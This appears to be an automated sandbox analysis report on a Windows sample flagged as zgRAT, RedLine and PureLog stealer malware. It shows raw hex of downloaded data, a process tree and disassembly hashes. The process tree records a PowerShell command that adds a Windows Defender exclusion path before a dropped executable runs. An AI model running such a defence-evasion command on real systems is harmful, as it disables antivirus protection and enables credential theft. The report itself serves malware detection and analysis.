                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 27 b4 4a ab 7b 9b c9 df 5f aa a8 25 04 7e 48 46 40 69 bc b3 6d 5d a5 82 2a 13 91 30 49 59 a2 8c 16 4a b1 f8 07 d1 01 88 fa 25 ad 04 26 3f f1 e1 3e 22 3d a9 a2 94 af 5c 39 22 f5 eb 12 44 2e 10 4f b7 57 d2 dd 1f 7e 36 a2 67 28 7c d3 66 5f da b1 dc ec 23 18 74 01 cf 12 aa 7f 9d 7e 02 cd 2f 54 e9 e0 66 cc e6 9e cf 5b 49 63 e2 40 da 7e 52 3b a4 9e 4d a8 9f ae 65 dc 1f a6 b5 1e 16 b0 04 3b 3f c3 a4 41 db 6f 5a d5 61 de df 1b 1b 72 1a 19 7e 9b d7 c7 0c 83 f9 9b a6 56 02 6a 19 a3 ca da 06 c2 c6 5f 28 92 23 e7 40 b7 3a 96 c5 43 51 92 c6 cb b9 73 42 f1 a3 f8 74 5e b5 73 e2 17 52 4c ce 2f 81 f0 37 a5 45 95 6d 10 e3 b5 96 8f 40 6d ad 54 5e f0 4d f0 a5 f1 97 18 a5 c0 6e cb 82 13 2b 30 a2 e0 18 37 71 3d 94 27 ed af 91 b1 85 2f 14 a8 9a 4d 36 0b 80 ea b7 a6 95 33 51 d3
                                                                                                                                                                                                                                              Data Ascii: 'J{_%~HF@im]*0IYJ%&?>"=\9"D.OW~6g(|f_#t~/Tf[Ic@~R;Me;?AoZar~Vj_(#@:CQsBt^sRL/7Em@mT^Mn+07q='/M63Q
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: cb 01 a8 e5 4c c1 ff 8a b2 37 f3 16 42 ef 22 e3 e7 e3 8d 0e 9f 6e bf 28 d3 32 7e 70 59 25 78 df 98 82 d9 da 00 d1 26 32 1c 23 c2 82 ab 81 c9 55 85 65 3a 60 3b d2 a5 9a f7 ed 6d eb 8d 88 32 78 db 5f 70 eb 3e 42 8f 6c d8 06 cc 33 24 d8 55 4c f9 6a f6 a2 fb 12 0a eb 54 48 8f 30 ab 76 1b 53 e6 93 02 c8 da 01 87 68 b9 68 c5 b9 e1 f1 55 d0 a5 cd bd d9 ad e4 09 f9 3a b7 c6 ac dc 63 70 9f 2b dd 6f bd 8d fd fd 47 eb c1 57 d5 05 26 3c 99 8d 78 a6 2b ec 91 5c 9f 7b 9c 7d e3 7a f5 f3 bc ec 3c 8b f0 2a a3 22 d9 2e 91 8f 71 bb bb 67 e1 06 60 ea 5a e6 fd eb 47 33 21 18 0c e6 57 e0 be db 8f aa 47 f4 dc 9c d0 ca 2d 7c 78 9e e8 14 a4 32 b8 42 54 a4 74 9f 91 61 c8 f6 67 6d a5 57 0b bd 27 ef d1 b3 53 7e 68 58 c0 9f f2 75 41 d1 32 0c a8 e4 0a 6a 65 79 21 4c 01 45 9d 54 90 bb
                                                                                                                                                                                                                                              Data Ascii: L7B"n(2~pY%x&2#Ue:`;m2x_p>Bl3$ULjTH0vShhU:cp+oGW&<x+\{}z<*".qg`ZG3!WG-|x2BTtagmW'S~hXuA2jey!LET
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: ce 16 03 8f 7f 63 42 87 42 d9 1e 11 30 e6 e8 6e eb a3 0a 43 a7 5c 29 02 ec cb 67 86 09 98 84 f7 ac b5 a3 bc cf 43 17 4c 18 ff 99 f2 95 3e 0b 8f 1c c6 46 3d 36 1c c5 a5 08 c2 e7 38 2b bc cb 7d e6 58 58 d3 3e 72 46 c0 01 ec ee 6e 9d 8c 96 72 1e 6f 3c 34 4e 32 97 31 01 e6 70 0c 26 a8 9f b3 6f b3 00 8f f7 fa 3a 59 a3 65 55 f7 12 32 be 9b fe 18 2a 27 b3 95 a2 63 77 71 8f 9b 40 9f a1 22 32 1f 67 a8 87 8a 53 1e ab eb b4 b3 bc a7 d6 4d 46 09 71 f6 0c 27 4c 19 ea e9 b6 ec 88 3c 51 f5 66 2d 1b 50 81 25 9b d8 9a d7 e1 a0 aa 80 12 d2 24 e3 da 82 e8 ee b2 5d 91 9f 1d 70 7a f7 5c 90 b1 79 84 b1 04 c0 64 a7 a9 67 5b c2 0b 14 6f 1f ed b9 14 77 8d 06 14 dc 14 bd 35 52 19 57 47 30 3e 26 7c 3c 93 07 f4 c2 11 35 1a eb 2b 99 ef 92 78 68 c8 48 bc 02 58 25 5c 2b 18 43 17 48 ad
                                                                                                                                                                                                                                              Data Ascii: cBB0nC\)gCL>F=68+}XX>rFnro<4N21p&o:YeU2*'cwq@"2gSMFq'L<Qf-P%$]pz\ydg[ow5RWG0>&|<5+xhHX%\+CH
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 51 ca ea 6d d8 4d 47 14 0f 97 93 c8 61 ae 74 72 4e b2 81 f5 33 e9 ee 9c 09 d7 65 51 ca ef f3 3a 51 45 13 79 da 60 de 63 ce 30 e9 88 4d c9 a4 03 4f 5f f5 5f cf 88 ee 22 cc 55 78 13 cb c6 62 c3 11 82 53 af 23 47 27 70 47 60 cd 38 01 e4 bf 0d 04 47 2c 22 fa f4 39 f0 c0 de 8d 20 34 e0 f6 da 29 6c 00 47 cc 71 a4 30 a7 7b a4 da 40 ab 26 f0 ac 79 af e5 c5 a2 a5 8d 1a 2a 17 d8 c3 c6 d1 40 f0 62 05 29 27 56 8c 82 69 0b c3 92 d7 78 1a 1c 75 49 eb db b4 54 f3 26 ca 95 58 da 41 3c 0a 8c 18 55 3b 49 49 c8 aa 74 b0 bd 51 95 b0 02 ce 43 43 c1 e8 88 aa 18 e0 73 e5 1c 23 b8 b0 b8 99 6d 0b e7 25 47 f4 ad 6e e3 6f 87 b2 cb a9 fe 46 cd cd 2d 51 8f 09 26 b3 20 c7 cb 07 bc 8f 59 a7 f9 41 bf 34 06 b0 e1 56 1c 0e 22 b0 98 d5 1e 4e b3 66 0c bb 79 f6 55 30 a4 63 be c3 67 7e d6 7a
                                                                                                                                                                                                                                              Data Ascii: QmMGatrN3eQ:QEy`c0MO__"UxbS#G'pG`8G,"9 4)lGq0{@&y*@b)'VixuIT&XA<U;IItQCCs#m%GnoF-Q& YA4V"NfyU0cg~z
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 7e 38 5a d8 32 6e 5c c8 8a bd d4 e2 f4 95 e3 16 a2 7a 13 52 f0 18 44 c5 f8 b4 92 bc af 97 51 a7 42 b1 ba f1 c0 a5 f0 bf 1d 2c 53 20 c9 29 98 d3 5c 7e 0e 91 2e 3e 05 cc 2f 9f ef ed c4 a1 af ae d9 39 74 d7 c7 9c 6e 3a 27 01 4e 26 02 e9 62 2a 7e e5 d7 f0 55 8d 13 ca 62 7e 69 20 65 99 92 e4 73 bc 6d 2d e3 91 ad 1c 68 27 d8 c4 da ed 21 2d 97 bd 5d 45 09 3b cd e3 bd 85 cd 6e 95 2e 71 ca 34 7e b9 a8 a2 9d d6 4d 21 b2 9a 1f 8b 80 d5 e3 d5 ea ec ed 44 21 88 44 44 55 07 c6 0d c8 df 19 25 53 1c 55 24 2b 5d 47 06 85 4a b4 fe cd 36 81 ce ee c0 ca 16 5c 5e 84 c4 a9 f8 aa c8 24 f6 83 3a 99 bb 50 58 0f 2c a5 01 17 4d 5e 8b 16 07 24 59 c2 4a 92 19 85 35 85 24 31 80 a0 d8 c3 bb 94 e6 f1 5c 7a ee 51 7c d2 17 2f ef ee e7 f7 8a 48 f0 fb 61 d0 c9 b8 3b 7c 02 e9 25 d2 fd 41 fd
                                                                                                                                                                                                                                              Data Ascii: ~8Z2n\zRDQB,S )\~.>/9tn:'N&b*~Ub~i esm-h'!-]E;n.q4~M!D!DDU%SU$+]GJ6\^$:PX,M^$YJ5$1\zQ|/Ha;|%A
                                                                                                                                                                                                                                              2024-11-12 13:50:27 UTC1378INData Raw: 7e e8 3b bc 3b 48 a5 f5 80 b1 30 d4 ea 07 52 b4 8f ca e2 a2 8e 64 26 f4 50 82 93 13 1b 31 84 bb 03 6b fc cd 75 1f 0d 5e 84 e6 b4 df 97 18 91 ad db b1 0f f9 62 b5 3f cc 67 94 56 61 0c 48 48 b5 73 bb 83 ca 13 eb 7e d1 b8 30 09 70 30 b6 e8 f7 ab 85 82 8f cd 4e 74 c2 0c 30 36 ff 0d 1a de 5a 09 29 95 8b 5a 9b e3 e1 a4 5a 66 c1 26 5b 82 bc 5b 06 52 34 e4 3c 60 39 5a 8e e8 bb 73 c4 32 31 10 97 f5 d6 c9 03 05 0a 4f fb 70 0c 82 c4 44 92 ea 70 ca eb e9 5c 75 f9 16 32 a1 b8 8a 77 ac 26 44 0a c7 1e 4b 79 9a fe fd ea 96 57 cc af bd 2d 1d 28 d0 6f f8 36 23 74 6b f4 95 42 2a ec 09 80 20 be 18 5f 7e e5 ff 60 41 ba 06 b8 bb 20 ba 4d 7d 08 f9 18 87 4d 46 08 cf 11 1e b7 b3 cd ce 81 ff b4 3d 67 5b ba 7b 65 6e c5 3a 88 c1 ee 6b 42 03 ce ea be 36 41 de 66 58 9e 45 f1 7f 1c 95
                                                                                                                                                                                                                                              Data Ascii: ~;;H0Rd&P1ku^b?gVaHHs~0p0Nt06Z)ZZf&[[R4<`9Zs21OpDp\u2w&DKyW-(o6#tkB* _~`A M}MF=g[{en:kB6AfXE


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:08:50:17
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\9LrEuTWP8s.exe"
                                                                                                                                                                                                                                              Imagebase:0xf70000
                                                                                                                                                                                                                                              File size:9'728 bytes
                                                                                                                                                                                                                                              MD5 hash:BA7D3BDA1009E3900C1ECA3D56AA8B4F
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:08:50:17
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:08:50:17
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                                                                                                                                                                                                                                              Imagebase:0x40000
                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:08:50:18
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:08:50:20
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff72d8c0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:08:50:28
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Path1\To2\Save444\uh3ex1.exe"
                                                                                                                                                                                                                                              Imagebase:0x710000
                                                                                                                                                                                                                                              File size:271'360 bytes
                                                                                                                                                                                                                                              MD5 hash:50CA49634420336958CE73629D9A2CF6
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:08:50:28
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:08:50:29
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              Imagebase:0xa70000
                                                                                                                                                                                                                                              File size:262'432 bytes
                                                                                                                                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 03280848 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 513665a1728e8bfc31bfc32a84b9b47786dd33c5fdcce0d7cad2468ae3153088
                                                                                                                                                                                                                                                • Instruction ID: a7b8a3911d8a16f7bf3b3ba98816ce98318629c68845fd2df09bfa54f8322a0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 513665a1728e8bfc31bfc32a84b9b47786dd33c5fdcce0d7cad2468ae3153088
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A621D131611214DFDB14FB68E8157BE7BB5EB88711F0490A9D40AA73C0CF784C86CB95
                                                                                                                                                                                                                                                Function 03280A01 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 53d6cbb3dc50e870c7aed9c50b9425f788912cbda42c340c140c3c41fd9574b8
                                                                                                                                                                                                                                                • Instruction ID: bda6ff5a946f48fc652febaaf40f1b1b6bf29bbc8a5251a5ce021fd6a0971877
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53d6cbb3dc50e870c7aed9c50b9425f788912cbda42c340c140c3c41fd9574b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4011BF30500745DFDB26DB68D8547EEB7F2EB88724F004A6CD44267691CBB9AD08CFA6
                                                                                                                                                                                                                                                Function 03280839 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 30662cef5bdf28d69311cad8c3a86f68adf9bb5e24703df922ef7c2b383ad672
                                                                                                                                                                                                                                                • Instruction ID: 10aad9bd2590d6dfc67375fb1f8dc68381ee6857ee712b6ecd4617d09cb67f83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30662cef5bdf28d69311cad8c3a86f68adf9bb5e24703df922ef7c2b383ad672
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF04931A003008FCB58EB68E9455FE77A9EBC8731F0551BAD50993260DB399C56CB52
                                                                                                                                                                                                                                                Function 032809C0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ccb576081765e2c470fd837c2418db624fb97992955d34554224fbee30ff61c
                                                                                                                                                                                                                                                • Instruction ID: 0776d693c05ffd78209d40f94da68e47574d784c2c619cbc521089a93d5018ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ccb576081765e2c470fd837c2418db624fb97992955d34554224fbee30ff61c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3E02631B402548FC34097FC94504DD7BE5EFCA71075140BAD001CBB91CA2A8C018750
                                                                                                                                                                                                                                                Function 0328094C Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6b31e97d749ef7849e59dcf5bf2a52dd4956e9ff262c4ea1eec3a583ff04568d
                                                                                                                                                                                                                                                • Instruction ID: 8b87c1593bd3780f2896312d6d07bf61aa7503190690ab77412bc2df1510b0f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b31e97d749ef7849e59dcf5bf2a52dd4956e9ff262c4ea1eec3a583ff04568d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8E086316403549BCE14F768E4911ED77A6FBC4726F00556DC11957140CF756D0AC756

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:6.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 21940 8747160 21941 87471a3 SetThreadToken 21940->21941 21942 87471d1 21941->21942

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 046BB470 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 516 46bb470-46bb4a9 518 46bb4ab 516->518 519 46bb4ae-46bb7e9 call 46bacbc 516->519 518->519 580 46bb7ee-46bb7f5 519->580
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 33198227bbc9d985662a473d2c4461e1574ca053141c56776843de2056503ef3
                                                                                                                                                                                                                                                • Instruction ID: a657101e5cddf5d933d4fb5fc652fe3713ae5029596f4c4a8b54328837cfe569
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33198227bbc9d985662a473d2c4461e1574ca053141c56776843de2056503ef3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44914E71A007186BEB15DFF888606AE7BF2EFC4B00B40892DD546AB750DF34A9059BE5
                                                                                                                                                                                                                                                Function 046BB490 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 665 46bb490-46bb4a9 666 46bb4ab 665->666 667 46bb4ae-46bb7e9 call 46bacbc 665->667 666->667 728 46bb7ee-46bb7f5 667->728
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 619338c724ae10530c8ab0bf34bf6bdf250198cc1e5950b2360fb87574a5b59b
                                                                                                                                                                                                                                                • Instruction ID: 6e380418d89a1a3ef7123d6d3a02d5d0285eb5b4ebe20819cbe81121dd5462ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 619338c724ae10530c8ab0bf34bf6bdf250198cc1e5950b2360fb87574a5b59b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E913E71B006186BEB15DFF888506AEBBF3EFC4B00B40892DD546AB750DF34A9059BE5
                                                                                                                                                                                                                                                Function 0874715A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 874715a-874719b 2 87471a3-87471cf SetThreadToken 0->2 3 87471d1-87471d7 2->3 4 87471d8-87471f5 2->4 3->4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 087471C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
